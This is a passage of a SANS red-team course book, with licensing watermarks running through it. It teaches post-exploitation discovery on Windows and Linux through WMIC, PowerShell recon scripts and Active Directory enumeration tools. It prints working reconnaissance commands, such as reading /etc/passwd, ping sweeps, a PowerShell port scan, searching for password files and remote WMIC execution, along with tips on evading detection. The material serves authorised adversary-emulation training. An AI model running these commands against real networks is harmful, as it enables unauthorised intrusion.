Network Propagation Once an initial foothold is obtained, post-exploitation activities begin. The Unified Kill Chain calls this step Network Propagation, although a few items in Initial Foothold phase are included in post-exploitation activities. This section assumes a shell has been obtained on a system and that access will now be used to learn more about the target system and network to move around and reach action on objectives. Note that these steps are not necessarily followed in a specific order. An adversary or Red Team will jump around and perform them from an opportunistic perspective based on what is learned and what is possible.

M

az

ze

Lincoln Mazzei nc o

ln

Discovery: With initial access, we will now learn more about the target system and network. Privilege Escalation: Depending on access obtained, privileges may need to be escalated to root, administrator, or SYSTEM. Persistence: Red Team worked hard for the initial access; persistence will allow them to keep the access. Defense Evasion and Execution: Not getting caught Credential Access: Obtaining credentials or hashes to attack passwords Lateral Movement and Pivoting: With all the above steps complete, lateral movement and pivoting through the environment to meet the objectives

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Reference: https://www.csacademy.nl/images/scripties/2018/Paul-Pols---The-Unified-Kill-Chain.pdf

live

16

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Discovery

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

17

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

17

© SANS Institute 2020 ATT&CK TA0007

Discovery

TM

090aff33bcb6e401ded410120bc9a268 Tactic that allows an attacker to gain knowledge about a system •

Account Discovery

• • • •

Processes and Services Security Software and Controls Network Enumeration Active Directory Enumeration

26 ,2 02 0

and the internal network

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

18

ak

er

@ ya

ho

22829180 i< an

nm

Discovery Discovery consists of techniques that allow the Red Team to gain knowledge about the system and internal network. When Red Team gains access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the exercise. The operating system provides many native tools that aid in this post-compromise information-gathering phase. It is recommended to use the built-in tools in initial discovery to not trigger a Blue Team IoC.

M

ln



Account Discovery: One of the first discovery steps is to understand the privilege you have and what other accounts exist in the system. Processes and Services: Determine the processes and services running on the local system and environment. Security Software and Controls: Generally obtained during threat intelligence and/or reconnaissance but good to know and understand before going further. Network Enumeration: Determine the systems in the same subnet and internal network accessible from current system. Active Directory Enumeration: Most organizations leverage Active Directory; enumeration of AD is crucial for network propagation step.

nc o



az

ze

Lincoln Mazzei

To :

ed

Li

ce



ns



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Reference: https://attack.mitre.org/tactics/TA0007/

18

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Careful with Deception

090aff33bcb6e401ded410120bc9a268 Operational Security Warning 26 ,2 02 0

• Emerging category of defense • Tries to deceive the adversary – Honeypots – Trap Servers – Honeytokens – Honeyusers

m

>

Ap ril

[email protected] o.

co

• Don’t get caught!

SEC564 | Red Team Exercises and Adversary Emulation

19

ak

er

@ ya

ho

22829180 i< an

nm

Careful with Deception Deception technology is an emerging category of cybersecurity defense that enables a more proactive security posture. It assumes the internal network or system will be compromised and places deception “tokens”, “traps” or “decoys” on the network and/or target system. Honeypots were perhaps the first very simple form of deception. A honeypot appeared simply as an unprotected system and presented itself in an attractive way to a prospective attacker already within the network. The notion of honeypots deceiving attackers, perhaps delaying and identifying them, and then ultimately supporting efforts to shut down the attack was a good one. Today, this is not only done with honeypots but with other decoys such as honeytokens, honeyusers, etc. As the discovery phase begins, the Red Team may come across deception technology. Try not to get caught!

nc o

ln

M

az

ze

Lincoln Mazzei

References: https://en.wikipedia.org/wiki/Deception_technology https://www.illusivenetworks.com/ https://trapx.com/ https://cymmetria.com/ https://attivonetworks.com/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

19

© SANS Institute 2020 ATT&CK T1059

Command-Line Interface

TM

090aff33bcb6e401ded410120bc9a268 Provides method for interacting with target systems 26 ,2 02 0

• Windows – cmd.exe – PowerShell

[email protected] Ap ril

• Linux

– /bin/bash

m

>

• macOS

o.

• Most C2 frameworks give you a shell

co

– zsh (as of Catalina)

SEC564 | Red Team Exercises and Adversary Emulation

20

ak

er

@ ya

ho

22829180 i< an

nm

Command-Line Interface Obtaining a shell is one of the main goals of obtaining initial access. A shell is a command-line interface that allows a red teamer to interact with the target operating system. As a fundamental part of all operating systems, it is important to know how to use the command-line interface on the target systems to interact and move further in the kill chain. It is very difficult for Blue Teams to detect when a shell is used so the Red Team should rely on it as much as possible to evade detection.

az

ze

Lincoln Mazzei nc o

ln

M

Windows: In Windows, the cmd.exe is the default shell which we will interact with to avoid detection. More and more often, Red Team is leveraging PowerShell but with logging in the later versions, Blue Teams are doing a better job and detecting it.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Li

Linux, UNIX, and macOS: In Linux, Unix, and most macOS versions, the default shell is /bin/bash. Starting with macOS Catalina, macOS uses zsh as the default login shell and interactive shell.

Li

ce

ns

ed

References: https://attack.mitre.org/techniques/T1059/ https://support.apple.com/en-us/HT208050

live

20

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1087

Account Discovery

TM

090aff33bcb6e401ded410120bc9a268 What privilege do you have and what accounts exist? Current user

26 ,2 02 0



C:\> whoami # whoami



Windows

[email protected] > m

Linux and UNIX

co



Ap ril

C:\> net user C:\> net group C:\> net localgroup

o.

$ groups $ cat /etc/passwd

SEC564 | Red Team Exercises and Adversary Emulation

21

ak

er

@ ya

ho

22829180 i< an

nm

Account Discovery One of the first commands issued by a Red Team or Adversary upon obtaining Initial Access is the whoami command, which lists the current user. ATT&CK technique T1033 states: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. Right after figuring out what permissions and users the current command is executing as, the Red Team or adversary will determine what other accounts exist on the system or the environment.

az

ze

Lincoln Mazzei nc o

ln

M

Windows: In Windows, the net command can be used to query local accounts, groups and memberships. The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. Net has a great deal of functionality, much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through Windows Admin Shares using net use commands, and interacting with services.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

Linux and UNIX: Apart from whoami, the id command shows current user information and group membership. The group command shows group membership as well. Lastly, the /etc/password file is world readable and provides list of users. A simple way to see content is cat /etc/passwd

Li

References: https://attack.mitre.org/techniques/T1087/ System Owner/User Discovery: https://attack.mitre.org/techniques/T1033/ https://attack.mitre.org/software/S0039/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

21

© SANS Institute 2020 ATT&CK T1057

Processes and Services

TM

090aff33bcb6e401ded410120bc9a268 Understand processes and services running on target 26 ,2 02 0

Windows



C:\> tasklist C:\> sc C:\> net start

[email protected] Ap ril

Linux and UNIX



o.

co

m

>

$ ps $ top

SEC564 | Red Team Exercises and Adversary Emulation

22

ak

er

@ ya

ho

22829180 i< an

nm

Processes and Services Red Team should attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on other systems in the network. Many organizations leverage a Golden Image or Build that ensures consistency across the environment.

ze

Lincoln Mazzei M

az

Windows: An example command that would obtain details on processes is tasklist using the Tasklist utility. Services that can be obtained with operating system utilities are sc, tasklist /svc, and net start commands.

nc o

ln

Linux and Unix systems: This is accomplished with the ps command or top. Red Team should try to understand as much as possible of the target host by what is installed and running. Here are some ideas of what to look for:

ns

ed

Agents: What agents are running on the system? What do they do? Patching: Are third-party tools used for patching? What is the process? Remote Access: Can end users remote to their system? If so, how? SSH, RDP, VPN clients

ce

• • •

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

References: Process Discovery: https://attack.mitre.org/techniques/T1057/ System Service Discovery: https://attack.mitre.org/techniques/T1007/

live

22

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1063

Security Software and Controls

TM

090aff33bcb6e401ded410120bc9a268 • Endpoint Security 26 ,2 02 0

– Antivirus – Application Whitelisting – Endpoint Detection and Response

• Logs and Log Forwarding • Policies

Ap ril

[email protected]

– Account and Password

m o.

co

– Firewall – Group Policy

>

• Windows Security Settings

SEC564 | Red Team Exercises and Adversary Emulation

23

ak

er

@ ya

ho

22829180 i< an

nm

Security Software and Controls Red Team should get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, antivirus, and virtualization. Adversaries add these checks into early-stage remote access tools to determine what is executed. This is an important step for the Red Team to continue with network propagation.

az

ze

Lincoln Mazzei nc o

ln

M

Endpoint Security: It is common to see antivirus running on most Windows systems today. It should be easy to identify based on the process name. Endpoint Detection and Response (EDR) is more and more common in enterprise environments today. Gartner’s Anton Chuvakin coined the term and defined it as “the tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints.” Logs and Forwarding: Identify what is logged locally and being sent remotely. Often, remote logging is in place with an agent. Policies: The local system will have policies around accounts and passwords. They may have Group Policy, which is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. Group Policy provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. Windows Security Settings: Windows may have other settings such as Firewall policy that allows traffic inbound and outbound. To see the whole configuration of the built-in Windows firewall, run: C:\> netsh advfirewall show allprofiles

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

References: System Information Discovery: https://attack.mitre.org/techniques/T1082/ Security Software Discovery: https://attack.mitre.org/techniques/T1063/ Password Policy Discovery: https://attack.mitre.org/techniques/T1201/ EDR Definition: https://blogs.gartner.com/anton-chuvakin/2013/07/26/named-endpoint-threat-detection-response/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

23

© SANS Institute 2020 ATT&CK T1016

Network Enumeration

TM

090aff33bcb6e401ded410120bc9a268 Identify network configuration and connections C:\> C:\> C:\> C:\>



– – – –

Promiscuous mode Requires admin or root privileges tcpdump Wireshark

[email protected]

Linux and UNIX:

Internal Scanning



# ifconfig # netstat –natu

ping 10.0.0.1

C:\> for /L %i in (1,1,255) do @ping –n 1 10.0.0.%i | find "TTL"

>

Routing tables and ARP:

m



Network Sniffers



ipconfig /all netstat –na net session C:\> ipconfig /displaydns

26 ,2 02 0

Windows:

Ap ril



– Linux, UNIX, and Windows:

co

PS C:\> 1..255 | % {ping –n 1 10.0.0.$_ | sls ttl}

o.

netstat –nr arp –a

SEC564 | Red Team Exercises and Adversary Emulation

24

ak

er

@ ya

ho

22829180 i< an

nm

Network Enumeration Windows: Red Team could run the netstat –na command to see current TCP and UDP port usage, indicating which machines have an established TCP connection or who have recently communicated with the box. The arp –a command dumps the system's ARP cache, showing the machines on the same subnet that the system has sent packets to in the last 10 minutes or so. Finally, the Windows ipconfig /displaydns command dumps the Windows DNS cache, showing recently resolved names, with a display including the remaining DNS Time-To-Live value, providing the Red Team with an estimate of how recently the record was resolved.

M

az

ze

Lincoln Mazzei nc o

ln

Linux and UNIX: The Red Team can run netstat –natu to see all TCP and UDP port usage as well as arp –a to dump the ARP cache. Linux machines typically do not maintain an operating system-wide DNS cache. It also can be worthwhile to grab the routing table of a compromised target, because it could reveal additional networks that we could focus on if they are in scope; on Windows, Linux, and most UNIXes, this information is available by running netstat -nr

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. A Red Team may place a network interface into promiscuous mode to passively access data in transit over the network or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.

live

Red Team may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. This can be as simple as running ping against other IPs in the same

24

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 subnet. Here is a FOR loop in Windows cmd.exe to scan a class C network: for /L %i in (1,1,255) do @ping –n 1 10.0.0.%i | find "TTL“ and the equivalent in PowerShell: PS C:\> 1..255 | % {ping –n 1 10.0.0.$_ | sls ttl} Lastly, to Port Scan with PowerShell: PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.0",$_)) "Port $_ is open" } 2>$null References: System Network Configuration Discovery: https://attack.mitre.org/techniques/T1016/ System Network Connections Discovery: https://attack.mitre.org/techniques/T1049/ Network Sniffing: https://attack.mitre.org/techniques/T1040/ Network Service Scanning: https://attack.mitre.org/techniques/T1046/

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

25

© SANS Institute 2020 ATT&CK T1047

WMIC for Discovery (1)

TM

090aff33bcb6e401ded410120bc9a268 •

WMIC = Windows Management Instrumentation Control command

– Built in to WinXP Pro through Windows 10; Can be used to manage Win2K and later



Can be used to interact with various aspects of a system

26 ,2 02 0

– Processes, services, startup, and more



Runs against local system by default C:\> wmic computersystem LIST full



Or can be invoked to take action on a target C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] computersystem LIST full

Ap ril

[email protected] >

– If you leave off the /user and /password, it will pass through the existing user's credentials

Use /node:@[filename] to run command on all machines listed one per line in filename



WMI Activity is logged in Event log under ID 5857

o.

co

m



SEC564 | Red Team Exercises and Adversary Emulation

26

ak

er

@ ya

ho

22829180 i< an

nm

WMIC for Discovery (1) WMIC is a command-line tool for controlling Windows machines via the Windows Management Instrumentation (WMI) framework and offers a powerful set of features for fine-grained control of Windows machines. It is built into Windows XP Pro (but not in XP Home) through Windows 10. The wmic command can be used to manage Windows 2000 and later systems, controlling many aspects of the system, including processes, services, startup Registry keys and folders, and numerous other items. By default, wmic takes action against the local system. Although, by invoking it with the options "/node:[targetIP] /user:[admin_user] /password:[password]", it can take effect on a remote system. If you provide a /node:[targetIP] and leave off the /user and /password fields, WMIC will pass through the existing user's credentials for authenticating to the target.

nc o

ln

M

az

ze

Lincoln Mazzei

C:\> wmic computersystem LIST full

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] computersystem LIST full

Li

ce

Note that the syntax "/node:@[filename]" can be used to run the command on multiple target machines, which are listed one per line (by machine name or IP address) in the file. The command runs with the privileges of the admin user specified in the wmic invocation. The command runs until it completes or until it is killed. WMI leaves logs, check the Event Log ID: 5857

live

References: https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4 https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+WMI+Logs/25012/ https://attack.mitre.org/techniques/T1047/

26

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1047

WMIC for Discovery (2)

TM

090aff33bcb6e401ded410120bc9a268 •

Antivirus:

C:\> wmic /namespace:\\root\securitycenter2 path antivirusproduct

File Search:

26 ,2 02 0



C:\> wmic DATAFILE where "drive='C:' AND Name like '%password%’” GET Name,readable,size /VALUE

[email protected]

Local User Accounts:

Ap ril



C:\> wmic USERACCOUNT Get Domain,Name,Sid

>

Domain Enumeration:

m



o.

co

C:\> wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE

SEC564 | Red Team Exercises and Adversary Emulation

27

ak

er

@ ya

ho

22829180 i< an

nm

WMIC for Discovery (2) Antivirus: C:\> wmic /namespace:\\root\securitycenter2 path antivirusproduct File Search: C:\> wmic DATAFILE where "drive='C:' AND Name like '%password%’” GET Name,readable,size /VALUE Local User Accounts: C:\> wmic USERACCOUNT Get Domain,Name,Sid Domain Enumeration: C:\> wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4 https://attack.mitre.org/techniques/T1047/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

27

© SANS Institute 2020 ATT&CK T1047

WMIC for Discovery (3)

TM

090aff33bcb6e401ded410120bc9a268 •

List all Users:

C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

Members of a Group:

26 ,2 02 0



C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

[email protected]

List all computers:

Ap ril



m

Execute Remote Commands:

co



>

C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

o.

C:\> wmic process call create "cmd.exe /c calc.exe"

SEC564 | Red Team Exercises and Adversary Emulation

28

ak

er

@ ya

ho

22829180 i< an

nm

WMIC for Discovery (3) List all Users: C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname Members of a Group: C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value List all computers: C:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname Execute Remote Commands: C:\> wmic process call create "cmd.exe /c calc.exe"

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4 https://attack.mitre.org/techniques/T1047/

live

28

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1047

WMIOps

TM

090aff33bcb6e401ded410120bc9a268 PowerShell script that uses WMI to interact with Windows host 26 ,2 02 0

• Written by Chris Truncer – Get-ProcessOwnersWMI: Returns all accounts that have active processes on the target system – Get-SystemDrivesWMI: Lists all local and network connected drives on target system – Get-ActiveNICSWMI: Lists all NICs on target system with an IP address

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

29

ak

er

@ ya

ho

22829180 ze

az

M

ln

• • • • •

Lincoln Mazzei

Invoke-ExecCommandWMI: Executes a user specified command on the target machine Invoke-KillProcessWMI: Kills a process (via process name or ID) on the target machine Get-RunningProcessesWMI: Returns all running processes from the target machine Find-ActiveUsersWMI: Checks if a user is active at the desktop on the target machine (or if away from their machine) Get-ProcessOwnersWMI: Returns all accounts that have active processes on the target system Get-SystemDrivesWMI: Lists all local and network connected drives on target system Get-ActiveNICSWMI: Lists all NICs on target system with an IP address Invoke-DirectoryListing: Lists files/directories within a user specified directory over WMI Get-FileContentsWMI: Reads the contents of a user specified file on a target system and displays the contents Find-UserSpecifiedFileWMI: Searches for a file (wildcard supported) on a target system Invoke-FileTransferOverWMI: Uploads or Downloads files to/from the target machine over WMI Invoke-CreateShareandExecute: Creates a share, copies file into it, uses WMI to invoke the script on the target system, from the local system, via UNC path Invoke-RemoteScriptWithOutput: Executes a PowerShell script in memory on the target host via WMI and returns the output Invoke-SchedJobManipulation: Allows you to list, delete, or create jobs on a system over WMI Invoke-ServiceManipulation: Allows you to start, stop, create, or delete services on a targeted system over WMI Invoke-PowerOptionsWMI: Force logs off all users, reboots, or shuts down targeted system

nc o

• • • •

i< an

nm

WMIOps WMIOps is a PowerShell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment developed by Chris Truncer.

• • • •

To :

ed

ns

ce

Li

• • •

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

References: https://github.com/FortyNorthSecurity/WMIOps https://attack.mitre.org/techniques/T1047/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

29

© SANS Institute 2020 ATT&CK T1086

PowerShell for Discovery

TM

090aff33bcb6e401ded410120bc9a268 Many PowerShell scripts to automate discovery 26 ,2 02 0

Invoke-HostRecon – by Beau Bullock Invoke-HostEnum – by Andrew Chiles Get-ComputerDetails – by Joe Bialek Invoke-Portscan – by Rich Lundeen RemoteRecon – by Chris Ross PowerView – by Will Schroeder

• • • • • •

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

30

ak

er

@ ya

ho

22829180 i< an

nm

PowerShell for Discovery There are many PowerShell scripts that can automate the discovery phase both on the local system and for the environment. Empire brings most of these scripts or similar functionality to the framework. As the below are PowerShell scripts, they can be imported individually into Empire as well.

ze

Lincoln Mazzei az

Invoke-HostRecon – by Beau Bullock. Gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection. Other checks include determining the firewall status, the antivirus solution installed, if LAPS is used and the application whitelisting product. Invoke-HostEnum – by Andrew Chiles with code by harmj0y, Joe Bialek, rvrsh3ll, Beau Bullock, Tim Medin. Script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain, it can also perform limited domain enumeration with the -Domain switch. Get-ComputerDetails – by Joe Bialek. This script is used to get useful information from a computer. Currently, the script gets the following information: Explicit Credential Logons (Event ID 4648); Logon events (Event ID 4624)-AppLocker logs to find what processes are created; PowerShell logs to find PowerShell scripts that have been executed; RDP Client Saved Servers, which indicates what servers the user typically RDP's in to. Invoke-Portscan – by Rich Lundeen. Does a simple port scan using regular sockets, based (pretty) loosely on Nmap. Remote-Recon – by Chris Ross. When local administrator credentials have been obtained and these credentials are shared into a number of hosts, it is possible to utilize WMI in order to perform situational awareness on remote hosts. The script can capture keystrokes and screenshots, execute commands and shellcode and also can load PowerShell scripts for additional tasks.

nc o



ln

M



• •

30

Li

ce

ns

ed



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 •

PowerView – by harmjoy. PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: https://github.com/dafthack/HostRecon https://github.com/threatexpress/red-team-scripts https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Get-ComputerDetails.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 https://pentestlab.blog/2018/05/28/situational-awareness/ https://attack.mitre.org/techniques/T1086/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

31

© SANS Institute 2020 Active Directory Enumeration

090aff33bcb6e401ded410120bc9a268 Most organizations leverage Active Directory (AD) 26 ,2 02 0

• AD is a database with: – Resources: Computers, Users, Shares – Security Policies and Central Management: Group Policy – Access Rules that control relationships between resources: DACLs

co

m

>

Ap ril

[email protected] o.

• https://adsecurity.org/

SEC564 | Red Team Exercises and Adversary Emulation

32

ak

er

@ ya

ho

22829180 i< an

nm

Active Directory Enumeration Active Directory is a technology developed by Microsoft and included in professional versions of Windows. It is by far the most commonly used enterprise directory service. Its built-in enterprise management tools render it a dream for both sysadmins and adversaries. AD is not limited to only Windows systems! Active Directory started out as a directory service for Windows domains, but has grown beyond domain, user and computer management. Compromise of the Active Directory typically means a full compromise of the (majority of the) IT environment. Adversaries will thus make it a priority to come after your AD! The key Active Directory services we will focus upon are security-related: Resources: Computers, Users, Shares Security Policies and Central Management: Group Policy Access Rules that control relationships between resources: DACLs

nc o

• • •

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

Reference: https://adsecurity.org/

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

32

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Active Directory Enumeration

090aff33bcb6e401ded410120bc9a268 Query AD for tons of data and review offline What to look for: • Forest and Domains • Organizational Units (OU)

26 ,2 02 0

How to look for it: • ADRecon • Grouper2 • PowerView • BloodHound • Rubeus

[email protected] m

>

Ap ril

– Users – Computers – Groups

o.

co

• Group Policy Objects • Administrators

SEC564 | Red Team Exercises and Adversary Emulation

33

ak

er

@ ya

ho

22829180 i< an

nm

Active Directory Enumeration Most organizations leverage Active Directory and it is very probable a Red Team will obtain initial access to a domain joined computer that current privilege is that of a domain user. Active Directory is very complex and enumeration will obtain a number of components such as: Forest; Domain; Trusts; Sites; Subnets; Default and Fine Grained Password Policy; Domain Controllers, SMB versions; Users and their attributes; Service Principal Names (SPNs); Groups and memberships; Organizational Units (OUs); GroupPolicy objects and gPLink details; DNS Zones and Records; Printers; Computers and their attributes; PasswordAttributes; LAPS passwords; BitLocker Recovery Keys; ACLs (DACLs and SACLs) for the Domain; and Domain accounts used for service accounts. There are many tools to automate the extraction of this data for offline analysis:

nc o

ln

M

az

ze

Lincoln Mazzei

ADRecon is a tool that extracts and combines various artifacts out of an AD environment. The information can be presented in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

Grouper2 is a tool for Red Team to help find security-related misconfigurations in Active Directory Group Policy. It dumps all the most interesting parts of group policy and roots around in them for exploitable stuff.

Li

PowerView – by harmjoy. PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

live

BloodHound is a single page JavaScript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attacks can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

33

© SANS Institute 2020 can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment. BloodHound is developed by @_wald0, @CptJesus, and @harmj0y.

090aff33bcb6e401ded410120bc9a268 References: https://github.com/sense-of-security/ADRecon https://github.com/l0ss/Grouper2 https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 https://github.com/BloodHoundAD/Bloodhound/wiki https://github.com/GhostPack/Rubeus

26 ,2 02 0

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization—without their prior work, this project would not exist.

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

34

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 PowerView

090aff33bcb6e401ded410120bc9a268 • Written by Will Schroeder (@harmj0y) 26 ,2 02 0

Part of PowerSploit; included in Empire PowerShell version 2.0-compliant Network and domain discover tool Verb-PrefixNoun: Gives an indication of the data source being queried

Ap ril

[email protected] o.

co

m

>

• • • •

SEC564 | Red Team Exercises and Adversary Emulation

35

ak

er

@ ya

ho

22829180 i< an

nm

PowerView PowerView is a PowerShell script developed by Will Schroeder and is part of PowerSploit framework and Empire. The script relies solely on PowerShell and WMI (Windows Management Instrumentation) queries. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. It also implements various useful metafunctions, including some custom-written user-hunting functions that will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist.

ln

M

az

ze

Lincoln Mazzei nc o

PowerView leverages a Verb-PrefixNoun syntax, which gives an indication of the data source being queried.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

